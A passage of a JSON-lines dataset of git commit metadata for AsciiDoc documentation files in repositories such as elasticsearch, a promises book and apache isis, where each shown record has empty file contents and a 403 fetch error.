elasticsearch,mjhennig\/elasticsearch,nomoa\/elasticsearch,Kakakakakku\/elasticsearch,clintongormley\/elasticsearch,Uiho\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,andrestc\/elasticsearch,NBSW\/elasticsearch,kingaj\/elasticsearch,alexkuk\/elasticsearch,fernandozhu\/elasticsearch,sposam\/elasticsearch,Flipkart\/elasticsearch,F0lha\/elasticsearch,lzo\/elasticsearch-1,mm0\/elasticsearch,Siddartha07\/elasticsearch,sdauletau\/elasticsearch,yanjunh\/elasticsearch,alexbrasetvik\/elasticsearch,pranavraman\/elasticsearch,truemped\/elasticsearch,mortonsykes\/elasticsearch,gingerwizard\/elasticsearch,vingupta3\/elasticsearch,andrestc\/elasticsearch,bestwpw\/elasticsearch,nezirus\/elasticsearch,scottsom\/elasticsearch,pablocastro\/elasticsearch,cwurm\/elasticsearch,schonfeld\/elasticsearch,vroyer\/elassandra,rlugojr\/elasticsearch,naveenhooda2000\/elasticsearch,lmtwga\/elasticsearch,MisterAndersen\/elasticsearch,beiske\/elasticsearch,slavau\/elasticsearch,szroland\/elasticsearch,nezirus\/elasticsearch,elasticdog\/elasticsearch,Flipkart\/elasticsearch,palecur\/elasticsearch,sarwarbhuiyan\/elasticsearch,lks21c\/elasticsearch,tebriel\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,nomoa\/elasticsearch,franklanganke\/elasticsearch,artnowo\/elasticsearch,andrejserafim\/elasticsearch,khiraiwa\/elasticsearch,iamjakob\/elasticsearch,jeteve\/elasticsearch,huanzhong\/elasticsearch,sreeramjayan\/elasticsearch,mcku\/elasticsearch,caengcjd\/elasticsearch,markwalkom\/elasticsearch,ckclark\/elasticsearch,loconsolutions\/elasticsearch,truemped\/elasticsearch,JSCooke\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,easonC\/elasticsearch,18098924759\/elasticsearch,EasonYi\/elasticsearch,Helen-Zhao\/elasticsearch,mnylen\/elasticsearch,lydonchandra\/elasticsearch,MetSystem\/elasticsearch,qwerty4030\/elasticsearch,episerver\/elasticsearch,wimvds\/elast
icsearch,18098924759\/elasticsearch,mjhennig\/elasticsearch,beiske\/elasticsearch,Rygbee\/elasticsearch,fooljohnny\/elasticsearch,chirilo\/elasticsearch,Clairebi\/ElasticsearchClone,iamjakob\/elasticsearch,wbowling\/elasticsearch,kimimj\/elasticsearch,milodky\/elasticsearch,amit-shar\/elasticsearch,pritishppai\/elasticsearch,mbrukman\/elasticsearch,mapr\/elasticsearch,himanshuag\/elasticsearch,aglne\/elasticsearch,yynil\/elasticsearch,myelin\/elasticsearch,dylan8902\/elasticsearch,JervyShi\/elasticsearch,iantruslove\/elasticsearch,tkssharma\/elasticsearch,lydonchandra\/elasticsearch,ZTE-PaaS\/elasticsearch,loconsolutions\/elasticsearch,cwurm\/elasticsearch,himanshuag\/elasticsearch,markharwood\/elasticsearch,EasonYi\/elasticsearch,vvcephei\/elasticsearch,myelin\/elasticsearch,huypx1292\/elasticsearch,awislowski\/elasticsearch,EasonYi\/elasticsearch,feiqitian\/elasticsearch,fred84\/elasticsearch,dataduke\/elasticsearch,MisterAndersen\/elasticsearch,C-Bish\/elasticsearch,nknize\/elasticsearch,truemped\/elasticsearch,nazarewk\/elasticsearch,alexbrasetvik\/elasticsearch,mjason3\/elasticsearch,sarwarbhuiyan\/elasticsearch,petabytedata\/elasticsearch,hafkensite\/elasticsearch,caengcjd\/elasticsearch,MaineC\/elasticsearch,lchennup\/elasticsearch,hydro2k\/elasticsearch,javachengwc\/elasticsearch,sreeramjayan\/elasticsearch,KimTaehee\/elasticsearch,jchampion\/elasticsearch,kubum\/elasticsearch,abibell\/elasticsearch,tkssharma\/elasticsearch,ESamir\/elasticsearch,camilojd\/elasticsearch,tahaemin\/elasticsearch,LewayneNaidoo\/elasticsearch,andrestc\/elasticsearch,ImpressTV\/elasticsearch,HarishAtGitHub\/elasticsearch,kingaj\/elasticsearch,hafkensite\/elasticsearch,hirdesh2008\/elasticsearch,lmtwga\/elasticsearch,mjason3\/elasticsearch,trangvh\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,gingerwizard\/elasticsearch,mrorii\/elasticsearch,drewr\/elasticsearch,LeoYao\/elasticsearch,AndreKR\/elasticsearch,slavau\/elasticsearch,mute\/elasticsearch,sreeramjayan\/elasticsearch,elasticdog\/elasticsearch,Ansh90\/elasticsearch,lightslife\/elasticsearch,javachengwc\/elasticsearch,hirdesh2008\/elasticsearch,wittyameta\/elasticsearch,mmaracic\/elasticsearch,btiernay\/elasticsearch,tkssharma\/elasticsearch,truemped\/elasticsearch,Stacey-Gammon\/elasticsearch,mm0\/elasticsearch,vrkansagara\/elasticsearch,petabytedata\/elasticsearch,glefloch\/elasticsearch,acchen97\/elasticsearch,camilojd\/elasticsearch,kubum\/elasticsearch,wayeast\/elasticsearch,episerver\/elasticsearch,martinstuga\/elasticsearch,karthikjaps\/elasticsearch,wayeast\/elasticsearch,xpandan\/elasticsearch,adrianbk\/elasticsearch,kalburgimanjunath\/elasticsearch,Widen\/elasticsearch,sneivandt\/elasticsearch,fred84\/elasticsearch,diendt\/elasticsearch,Shekharrajak\/elasticsearch,sc0ttkclark\/elasticsearch,wenpos\/elasticsearch,mapr\/elasticsearch,MichaelLiZhou\/elasticsearch,codebunt\/elasticsearch,rmuir\/elasticsearch,rmuir\/elasticsearch,zkidkid\/elasticsearch,kingaj\/elasticsearch,njlawton\/elasticsearch,vietlq\/elasticsearch,jsgao0\/elasticsearch,mgalushka\/elasticsearch,episerver\/elasticsearch,Brijeshrpatel9\/elasticsearch,beiske\/elasticsearch,artnowo\/elasticsearch,tsohil\/elasticsearch,drewr\/elasticsearch,LeoYao\/elasticsearch,scorpionvicky\/elasticsearch,martinstuga\/elasticsearch,amit-shar\/elasticsearch,LewayneNaidoo\/elasticsearch,strapdata\/elassandra-test,maddin2016\/elasticsearch,jprante\/elasticsearch,mgalushka\/elasticsearch,lydonchandra\/elasticsearch,ydsakyclguozi\/elasticsearch,alexbrasetvik\/elasticsearch,schonfeld\/elasticse
arch,MjAbuz\/elasticsearch,Clairebi\/ElasticsearchClone,jprante\/elasticsearch,ThalaivaStars\/OrgRepo1,jango2015\/elasticsearch,HonzaKral\/elasticsearch,NBSW\/elasticsearch,elancom\/elasticsearch,schonfeld\/elasticsearch,jchampion\/elasticsearch,MjAbuz\/elasticsearch,jaynblue\/elasticsearch,MaineC\/elasticsearch,vrkansagara\/elasticsearch,i-am-Nathan\/elasticsearch,xingguang2013\/elasticsearch,NBSW\/elasticsearch,hanswang\/elasticsearch,Shepard1212\/elasticsearch,markllama\/elasticsearch,Fsero\/elasticsearch,tahaemin\/elasticsearch,achow\/elasticsearch,StefanGor\/elasticsearch,vrkansagara\/elasticsearch,strapdata\/elassandra-test,jchampion\/elasticsearch,koxa29\/elasticsearch,rmuir\/elasticsearch,hirdesh2008\/elasticsearch,YosuaMichael\/elasticsearch,scottsom\/elasticsearch,Rygbee\/elasticsearch,scorpionvicky\/elasticsearch,jeteve\/elasticsearch,clintongormley\/elasticsearch,franklanganke\/elasticsearch,mute\/elasticsearch,huypx1292\/elasticsearch,fekaputra\/elasticsearch,Shepard1212\/elasticsearch,feiqitian\/elasticsearch,yongminxia\/elasticsearch,Uiho\/elasticsearch,acchen97\/elasticsearch,petabytedata\/elasticsearch,linglaiyao1314\/elasticsearch,i-am-Nathan\/elasticsearch,jw0201\/elastic,baishuo\/elasticsearch_v2.1.0-baishuo,vroyer\/elassandra,ckclark\/elasticsearch,humandb\/elasticsearch,nomoa\/elasticsearch,weipinghe\/elasticsearch,drewr\/elasticsearch,sauravmondallive\/elasticsearch,caengcjd\/elasticsearch,LeoYao\/elasticsearch,obourgain\/elasticsearch,sreeramjayan\/elasticsearch,vietlq\/elasticsearch,martinstuga\/elasticsearch,kevinkluge\/elasticsearch,amit-shar\/elasticsearch,i-am-Nathan\/elasticsearch,mjason3\/elasticsearch,ydsakyclguozi\/elasticsearch,zkidkid\/elasticsearch,TonyChai24\/ESSource,jango2015\/elasticsearch,knight1128\/elasticsearch,Helen-Zhao\/elasticsearch,apepper\/elasticsearch,humandb\/elasticsearch,kunallimaye\/elasticsearch,skearns64\/elasticsearch,mohit\/elasticsearch,wuranbo\/elasticsearch,jbertouch\/elasticsearch,sarwarbhuiyan\/elasticsearch,areek\/elasticsearch,glefloch\/elasticsearch,markwalkom\/elasticsearch,shreejay\/elasticsearch,xingguang2013\/elasticsearch,franklanganke\/elasticsearch,mrorii\/elasticsearch,jaynblue\/elasticsearch,andrestc\/elasticsearch,HarishAtGitHub\/elasticsearch,lydonchandra\/elasticsearch,vvcephei\/elasticsearch,wangtuo\/elasticsearch,nezirus\/elasticsearch,hanswang\/elasticsearch,aglne\/elasticsearch,likaiwalkman\/elasticsearch,vietlq\/elasticsearch,vingupta3\/elasticsearch,Uiho\/elasticsearch,pritishppai\/elasticsearch,martinstuga\/elasticsearch,diendt\/elasticsearch,wangtuo\/elasticsearch,jprante\/elasticsearch,huanzhong\/elasticsearch,ckclark\/elasticsearch,ZTE-PaaS\/elasticsearch,snikch\/elasticsearch,henakamaMSFT\/elasticsearch,chirilo\/elasticsearch,dongjoon-hyun\/elasticsearch,andrejserafim\/elasticsearch,hechunwen\/elasticsearch,Kakakakakku\/elasticsearch,luiseduardohdbackup\/elasticsearch,koxa29\/elasticsearch,vietlq\/elasticsearch,areek\/elasticsearch,gmarz\/elasticsearch,milodky\/elasticsearch,TonyChai24\/ESSource,ivansun1010\/elasticsearch,iamjakob\/elasticsearch,vroyer\/elasticassandra,javachengwc\/elasticsearch,cwurm\/elasticsearch,mm0\/elasticsearch,infusionsoft\/elasticsearch,mikemccand\/elasticsearch,lightslife\/elasticsearch,umeshdangat\/elasticsearch,mikemccand\/elasticsearch,TonyChai24\/ESSource,jbertouch\/elasticsearch,wuranbo\/elasticsearch,coding0011\/elasticsearch,anti-social\/elasticsearch,pranavraman\/elasticsearch,masterweb121\/elasticsearch,onegambler\/elasticsearch,amit-shar\/elasticsearch,ouyangkongto
ng\/elasticsearch,hechunwen\/elasticsearch,hirdesh2008\/elasticsearch,infusionsoft\/elasticsearch,Widen\/elasticsearch,djschny\/elasticsearch,NBSW\/elasticsearch,chirilo\/elasticsearch,HarishAtGitHub\/elasticsearch,rajanm\/elasticsearch,alexbrasetvik\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,aglne\/elasticsearch,snikch\/elasticsearch,winstonewert\/elasticsearch,hydro2k\/elasticsearch,njlawton\/elasticsearch,jimczi\/elasticsearch,xuzha\/elasticsearch,sauravmondallive\/elasticsearch,queirozfcom\/elasticsearch,TonyChai24\/ESSource,ImpressTV\/elasticsearch,truemped\/elasticsearch,anti-social\/elasticsearch,TonyChai24\/ESSource,mbrukman\/elasticsearch,hanswang\/elasticsearch,lzo\/elasticsearch-1,sneivandt\/elasticsearch,socialrank\/elasticsearch,wimvds\/elasticsearch,sdauletau\/elasticsearch,18098924759\/elasticsearch,mcku\/elasticsearch,kalimatas\/elasticsearch,elasticdog\/elasticsearch,knight1128\/elasticsearch,drewr\/elasticsearch,rmuir\/elasticsearch,MichaelLiZhou\/elasticsearch,rento19962\/elasticsearch,MjAbuz\/elasticsearch,Liziyao\/elasticsearch,ThalaivaStars\/OrgRepo1,sposam\/elasticsearch,palecur\/elasticsearch,masaruh\/elasticsearch,lchennup\/elasticsearch,queirozfcom\/elasticsearch,polyfractal\/elasticsearch,elancom\/elasticsearch,yongminxia\/elasticsearch,diendt\/elasticsearch,sc0ttkclark\/elasticsearch,pozhidaevak\/elasticsearch,mrorii\/elasticsearch,btiernay\/elasticsearch,ckclark\/elasticsearch,pozhidaevak\/elasticsearch,smflorentino\/elasticsearch,strapdata\/elassandra5-rc,liweinan0423\/elasticsearch,SergVro\/elasticsearch,onegambler\/elasticsearch,sdauletau\/elasticsearch,EasonYi\/elasticsearch,bestwpw\/elasticsearch,socialrank\/elasticsearch,markwalkom\/elasticsearch,zeroctu\/elasticsearch,mgalushka\/elasticsearch,NBSW\/elasticsearch,khiraiwa\/elasticsearch,btiernay\/elasticsearch,hafkensite\/elasticsearch,onegambler\/elasticsearch,naveenhooda2000\/elasticsearch,pritishppai\/elasticsearch,lzo\/elasticsearch-1,milodky\/elasticsearch,fernandozhu\/elasticsearch,gmarz\/elasticsearch,weipinghe\/elasticsearch,Kakakakakku\/elasticsearch,sauravmondallive\/elasticsearch,jeteve\/elasticsearch,onegambler\/elasticsearch,kevinkluge\/elasticsearch,shreejay\/elasticsearch,MjAbuz\/elasticsearch,djschny\/elasticsearch,KimTaehee\/elasticsearch,nknize\/elasticsearch,wittyameta\/elasticsearch,khiraiwa\/elasticsearch,springning\/elasticsearch,umeshdangat\/elasticsearch,iacdingping\/elasticsearch,lchennup\/elasticsearch,zhiqinghuang\/elasticsearch,zeroctu\/elasticsearch,wbowling\/elasticsearch,skearns64\/elasticsearch,jsgao0\/elasticsearch,jw0201\/elastic,martinstuga\/elasticsearch,s1monw\/elasticsearch,strapdata\/elassandra5-rc,mute\/elasticsearch,yongminxia\/elasticsearch,strapdata\/elassandra5-rc,ckclark\/elasticsearch,huanzhong\/elasticsearch,szroland\/elasticsearch,PhaedrusTheGreek\/elasticsearch,PhaedrusTheGreek\/elasticsearch,apepper\/elasticsearch,jpountz\/elasticsearch,nellicus\/elasticsearch,onegambler\/elasticsearch,wimvds\/elasticsearch,PhaedrusTheGreek\/elasticsearch,likaiwalkman\/elasticsearch,nilabhsagar\/elasticsearch,obourgain\/elasticsearch,achow\/elasticsearch,gmarz\/elasticsearch,ouyangkongtong\/elasticsearch,18098924759\/elasticsearch,phani546\/elasticsearch,dataduke\/elasticsearch,thecocce\/elasticsearch,TonyChai24\/ESSource,mrorii\/elasticsearch,jango2015\/elasticsearch,spiegela\/elasticsearch,skearns64\/elasticsearch,alexkuk\/elasticsearch,mjason3\/elasticsearch,trangvh\/elasticsearch,lmtwga\/elasticsearch,gfyoung\/elasticsearch,weipinghe\/elasticsearch,pranavraman
\/elasticsearch,springning\/elasticsearch,nilabhsagar\/elasticsearch,fekaputra\/elasticsearch,18098924759\/elasticsearch,szroland\/elasticsearch,cnfire\/elasticsearch-1,wangtuo\/elasticsearch,KimTaehee\/elasticsearch,ivansun1010\/elasticsearch,yongminxia\/elasticsearch,masaruh\/elasticsearch,NBSW\/elasticsearch,tsohil\/elasticsearch,HarishAtGitHub\/elasticsearch,bawse\/elasticsearch,nazarewk\/elasticsearch,lightslife\/elasticsearch,truemped\/elasticsearch,ulkas\/elasticsearch,wbowling\/elasticsearch,wimvds\/elasticsearch,infusionsoft\/elasticsearch,lmtwga\/elasticsearch,lks21c\/elasticsearch,mnylen\/elasticsearch,vroyer\/elasticassandra,glefloch\/elasticsearch,areek\/elasticsearch,ThalaivaStars\/OrgRepo1,djschny\/elasticsearch,lightslife\/elasticsearch,abibell\/elasticsearch,iantruslove\/elasticsearch,jimhooker2002\/elasticsearch,adrianbk\/elasticsearch,geidies\/elasticsearch,loconsolutions\/elasticsearch,infusionsoft\/elasticsearch,skearns64\/elasticsearch,StefanGor\/elasticsearch,F0lha\/elasticsearch,golubev\/elasticsearch,cnfire\/elasticsearch-1,wimvds\/elasticsearch,scorpionvicky\/elasticsearch,Shekharrajak\/elasticsearch,artnowo\/elasticsearch,acchen97\/elasticsearch,nazarewk\/elasticsearch,spiegela\/elasticsearch,rajanm\/elasticsearch,wangyuxue\/elasticsearch,btiernay\/elasticsearch,LeoYao\/elasticsearch,sreeramjayan\/elasticsearch,davidvgalbraith\/elasticsearch,winstonewert\/elasticsearch,koxa29\/elasticsearch","old_file":"docs\/reference\/setup\/repositories.asciidoc","new_file":"docs\/reference\/setup\/repositories.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"09abdf41e18a16ebfac674297786aa0622b0beed","subject":"y2b create post THIS CAMERA SEES IT ALL","message":"y2b create post THIS CAMERA SEES IT ALL","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-04-22-THIS-CAMERA-SEES-IT-ALL.adoc","new_file":"_posts\/2016-04-22-THIS-CAMERA-SEES-IT-ALL.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c12267116e508477f9d3736df39c235124f4d88","subject":"chore(html): fix pdf download name","message":"chore(html): fix pdf download 
name\n","repos":"charlenopires\/promises-book,mzbac\/promises-book,tangjinzhou\/promises-book,charlenopires\/promises-book,wangwei1237\/promises-book,wenber\/promises-book,cqricky\/promises-book,xifeiwu\/promises-book,genie88\/promises-book,genie88\/promises-book,liyunsheng\/promises-book,purepennons\/promises-book,sunfurong\/promise,azu\/promises-book,xifeiwu\/promises-book,wangwei1237\/promises-book,azu\/promises-book,wenber\/promises-book,wangwei1237\/promises-book,mzbac\/promises-book,cqricky\/promises-book,wenber\/promises-book,xifeiwu\/promises-book,oToUC\/promises-book,lidasong2014\/promises-book,dieface\/promises-book,sunfurong\/promise,tangjinzhou\/promises-book,tangjinzhou\/promises-book,liyunsheng\/promises-book,charlenopires\/promises-book,sunfurong\/promise,azu\/promises-book,azu\/promises-book,mzbac\/promises-book,liyunsheng\/promises-book,dieface\/promises-book,liubin\/promises-book,liubin\/promises-book,oToUC\/promises-book,lidasong2014\/promises-book,dieface\/promises-book,oToUC\/promises-book,purepennons\/promises-book,genie88\/promises-book,cqricky\/promises-book,purepennons\/promises-book,liubin\/promises-book,lidasong2014\/promises-book","old_file":"index.adoc","new_file":"index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c53a2b870ecfd5ef133032254e2195a76d9b7f3e","subject":"Fixing typo in spelling of rollover (#24146)","message":"Fixing typo in spelling of rollover (#24146)\n\nrolllover -> rollover","repos":"scorpionvicky\/elasticsearch,nezirus\/elasticsearch,mjason3\/elasticsearch,s1monw\/elasticsearch,markwalkom\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,brandonkearby\/elasticsearch,GlenRSmith\/elasticsearch,s1monw\/elasticsearch,sneivandt\/elasticsearch,pozhidaevak\/elasticsearch,nknize\/elasticsearch,wenpos\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wenpos\/elasticsearch,mjason3\/elasticsearch,winstonewert\/elasticsearch,robin13\/elasticsearch,shreejay\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,vroyer\/elasticassandra,maddin2016\/elasticsearch,alexshadow007\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nezirus\/elasticsearch,markwalkom\/elasticsearch,alexshadow007\/elasticsearch,HonzaKral\/elasticsearch,lks21c\/elasticsearch,scottsom\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,shreejay\/elasticsearch,markwalkom\/elasticsearch,rajanm\/elasticsearch,wangtuo\/elasticsearch,naveenhooda2000\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,uschindler\/elasticsearch,Stacey-Gammon\/elasticsearch,HonzaKral\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,maddin2016\/elasticsearch,Stacey-Gammon\/elasticsearch,nezirus\/elasticsearch,qwerty4030\/elasticsearch,wangtuo\/elasticsearch,robin13\/elasticsearch,lks21c\/elasticsearch,scottsom\/elasticsearch,nezirus\/elasticsearch,naveenhooda2000\/elasticsearch,qwerty4030\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,coding0011\/elasticsearch,jimczi\/elasticsearch,pozhidaevak\/elasticsearch,gingerwizard\/elasticsearch,winstonewert\/elasticsearch,winstonewert\/elasticsearch,umeshdangat\/elasticsearch,kalimatas\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,strapdata\/elassandra,maddin2016\/elasticsearch,umeshdangat\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gfyoung\/elasticsearch,gfy
oung\/elasticsearch,nezirus\/elasticsearch,lks21c\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,LeoYao\/elasticsearch,Stacey-Gammon\/elasticsearch,jimczi\/elasticsearch,coding0011\/elasticsearch,rajanm\/elasticsearch,uschindler\/elasticsearch,alexshadow007\/elasticsearch,LeoYao\/elasticsearch,fred84\/elasticsearch,mjason3\/elasticsearch,fred84\/elasticsearch,pozhidaevak\/elasticsearch,pozhidaevak\/elasticsearch,masaruh\/elasticsearch,mohit\/elasticsearch,LeoYao\/elasticsearch,nknize\/elasticsearch,mohit\/elasticsearch,umeshdangat\/elasticsearch,masaruh\/elasticsearch,sneivandt\/elasticsearch,LeoYao\/elasticsearch,strapdata\/elassandra,alexshadow007\/elasticsearch,wangtuo\/elasticsearch,kalimatas\/elasticsearch,robin13\/elasticsearch,sneivandt\/elasticsearch,rajanm\/elasticsearch,wangtuo\/elasticsearch,maddin2016\/elasticsearch,wenpos\/elasticsearch,mjason3\/elasticsearch,lks21c\/elasticsearch,winstonewert\/elasticsearch,scorpionvicky\/elasticsearch,kalimatas\/elasticsearch,vroyer\/elassandra,HonzaKral\/elasticsearch,Stacey-Gammon\/elasticsearch,markwalkom\/elasticsearch,pozhidaevak\/elasticsearch,jimczi\/elasticsearch,markwalkom\/elasticsearch,brandonkearby\/elasticsearch,scottsom\/elasticsearch,LeoYao\/elasticsearch,winstonewert\/elasticsearch,rajanm\/elasticsearch,strapdata\/elassandra,robin13\/elasticsearch,jimczi\/elasticsearch,umeshdangat\/elasticsearch,naveenhooda2000\/elasticsearch,shreejay\/elasticsearch,markwalkom\/elasticsearch,masaruh\/elasticsearch,mjason3\/elasticsearch,masaruh\/elasticsearch,s1monw\/elasticsearch,qwerty4030\/elasticsearch,mohit\/elasticsearch,kalimatas\/elasticsearch,sneivandt\/elasticsearch,uschindler\/elasticsearch,wenpos\/elasticsearch,naveenhooda2000\/elasticsearch,qwerty4030\/elasticsearch,scottsom\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,maddin2016\/elasticsearch,mohit\/elasticsearch,brandonkearby\/elasticsearch,s1monw\/elasticsearch,coding0011\/elasticsearch,fred84\/elasticsearch,LeoYao\/elasticsearch,umeshdangat\/elasticsearch,lks21c\/elasticsearch,vroyer\/elassandra,scorpionvicky\/elasticsearch,wenpos\/elasticsearch,vroyer\/elasticassandra,gfyoung\/elasticsearch,Stacey-Gammon\/elasticsearch,brandonkearby\/elasticsearch,scorpionvicky\/elasticsearch,LeoYao\/elasticsearch,mohit\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,fred84\/elasticsearch,jimczi\/elasticsearch,rajanm\/elasticsearch,GlenRSmith\/elasticsearch,alexshadow007\/elasticsearch,strapdata\/elassandra,wangtuo\/elasticsearch,vroyer\/elassandra,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,brandonkearby\/elasticsearch,vroyer\/elasticassandra,rajanm\/elasticsearch,naveenhooda2000\/elasticsearch,GlenRSmith\/elasticsearch,shreejay\/elasticsearch,gfyoung\/elasticsearch,kalimatas\/elasticsearch,scottsom\/elasticsearch,masaruh\/elasticsearch,robin13\/elasticsearch,fred84\/elasticsearch,shreejay\/elasticsearch,s1monw\/elasticsearch","old_file":"docs\/reference\/indices\/rollover-index.asciidoc","new_file":"docs\/reference\/indices\/rollover-index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"56526d79fa49a5a6cf72ddfc8b4da2d681d5cc1c","subject":"add blog entry 12 asciidoc","message":"add blog entry 12 
asciidoc\n","repos":"pubnub\/angular-js,pubnub\/angular-js,nishant8BITS\/angular-js,nishant8BITS\/angular-js,nishant8BITS\/angular-js,pubnub\/angular-js","old_file":"blog_12.asciidoc","new_file":"blog_12.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pubnub\/angular-js.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b43c69558a39863705b9d12e34734e12d77310c","subject":"Add docs here about the delete security group op added to kato and orca.","message":"Add docs here about the delete security group op added to kato and orca.\n","repos":"cfieber\/gate,spinnaker\/gate,cfieber\/gate,cfieber\/gate,spinnaker\/gate,spinnaker\/gate","old_file":"gate-manual\/src\/asciidoc\/deleteSecurityGroup.adoc","new_file":"gate-manual\/src\/asciidoc\/deleteSecurityGroup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cfieber\/gate.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c6e1416f51afc35ff1dbb1457e8ac80d7e5e5f38","subject":"Update 2018-12-05-vr-programing.adoc","message":"Update 2018-12-05-vr-programing.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-12-05-vr-programing.adoc","new_file":"_posts\/2018-12-05-vr-programing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3eb3e60fc35be36f515898c17df50c9433ed3e1c","subject":"trex_stateless: add rpc proxy info\/usage","message":"trex_stateless: add rpc proxy info\/usage\n","repos":"kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"trex_stateless.asciidoc","new_file":"trex_stateless.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1d1f6993e8208abadb1579fe0cacaaec042ec6f7","subject":"y2b create post The Shocking Lie Detector","message":"y2b create post The Shocking Lie Detector","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-12-28-The-Shocking-Lie-Detector.adoc","new_file":"_posts\/2016-12-28-The-Shocking-Lie-Detector.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f9ec956f4b367af389b44412e190677f451fb35","subject":"y2b create post The $12 Smart Watch - Does It Suck?","message":"y2b create post The $12 Smart Watch - Does It 
Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-07-The12SmartWatchDoesItSuck.adoc","new_file":"_posts\/2017-12-07-The12SmartWatchDoesItSuck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e02c24027f0e5c24f45e9a3a5deb2585609d8bd","subject":"ISIS-2883: Demo: adds initial pre-flight protocol","message":"ISIS-2883: Demo: adds initial pre-flight protocol","repos":"apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis","old_file":"examples\/demo\/pre-flight.adoc","new_file":"examples\/demo\/pre-flight.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/isis.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6be6fc87458fdfadcfe09b7aa81536591b24f4eb","subject":"Fixed the load of fixtures.","message":"Fixed the load of fixtures.","repos":"uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"83a7dee3782f0e81f8eaeb9aef3691fb84ed671a","subject":"Dep-Git Ex","message":"Dep-Git Ex\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Divers\/Dep-Git.adoc","new_file":"Divers\/Dep-Git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8603ab77bfc9906dcf1affdd7b0b1c77d21537b","subject":"docs: update security doc on --redact flag usage","message":"docs: update security doc on 